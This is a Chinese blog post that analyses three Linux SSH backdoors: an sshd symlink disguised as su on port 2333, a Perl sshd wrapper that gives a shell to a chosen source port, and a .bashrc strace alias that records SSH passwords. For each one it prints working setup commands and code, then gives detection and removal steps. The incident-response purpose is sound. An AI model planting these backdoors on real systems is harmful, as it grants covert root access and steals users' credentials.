Linux SSH Backdoor分析排查
2023-09-14 08:57:09 时间
1、SSH后门分类
SSH后门方式有以下几种
- 软链接
- SSH Server wrapper
- SSH Keylogger
2、软链接
- 利用方法
[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
- 排查方法
[root@helen]# netstat -anop
通过开发端口信息的PID查询进程路径,【ll /proc/xxxx】命令查看程序对应的路径。
- 清除后门
kill -9 pid
rm -rf 后门程序
3、SSH Server wrapper
- 利用方法
先将/usr/sbin/sshd文件mv到/usr/bin目录
[root@helen ~]# cd /usr/sbin/
[root@helen sbin]# mv sshd ../bin
[root@helen sbin]# vim sshd
再编辑sshd
#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
再设置权限
chmod 755 sshd
攻击者:
在本机上执行socat STDIO TCP4:target_ip:22,sourceport=19526
- 排查方法
查看端口可以看到网络外链的端口
因为正常的sshd路径是在/usr/sbin/sshd,通过命令【ll /proc/xxx】查看sshd的路径路径在/usr/bin/sshd。所以断定sshd被动过手脚。
通过查看sshd文件可得知sshd的确被动过手脚。
cat /usr/sbin/sshd
- 清除后门
rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;
4、SSH Keylogger
- 利用方法
编辑当前用户下的.bashrc文件
vi /root/.bashrc
在最后面添加如下后门代码:
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
【source .bashrc】命令使更改的配置生效
ssh连接或者su切换用户,输入密码时的密码,无论错误或者正确都能记录到log里
- 排查方法
排查环境变量
- 清除后门
清空增加的环境变量内容
5、参考
https://joychou.org/hostsec/linux-ssh-backdoor.html
http://pastebin.com/2NgL8SDE
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/
https://diogomonica.com/posts/poor-man-s-ssh-keylogger/
http://drops.wooyun.org/tips/1951
相关文章
- Linux 网卡流量监控脚本实现分析(linux网卡流量脚本)
- Linux实例开发指南:快速掌握实用技能(linux实例开发)
- Linux内核分析:深入探索应用之道(linux内核分析与应用)
- 深入Linux:反汇编工具的使用(linux反汇编工具)
- Linux安装SSH的简单步骤(linux怎么安装ssh)
- 指导Linux中改变环境变量的方法(linux改环境变量)
- 快速本地Linux文件同步(linux本地文件同步)
- Linux被植入后门:安全风险警示(linux被留后门了)
- 捕获探索Linux世界:数据包捕获技术分析(linux数据包)
- 使用命令行安装Linux:一种不同的体验(无图形界面安装linux)
- Linux下运行程序的简单方法(linux运行一个程序)
- Linux下的神奇软件:强大的助力(linux好用软件)
- 使用Linux终端轻松SSH登录远程主机(linux终端ssh)
- 如何在Linux上获取errno信息(linux获取errno)
- Linux多线程框架:提升程序效率和性能的利器(linux多线程框架)
- Linux服务器安全风险分析与对策(linux服务安全问题)
- 外部访问Linux限制SSH外部访问的有效措施(linux限制ssh)
- 如何在Linux上简便地建立LDAP连接(ldap连接linux)
- 如何在Linux上修改屏幕分辨率(linux怎么修改分辨率)
- Linux系统下使用UDP穿透技术实现网络通信(udp穿透linux)
- 探析Linux系统:全方位优势分析(linux系统有什么优点)
- Linux系统磁盘坏道快速检测分析(linux 磁盘坏道检查)
- Linux下开启SSH远程管理:一步一步学习(linux打开ssh)
- 快速掌握SSH连接Linux实现服务器远程操作(ssh 连接 linux)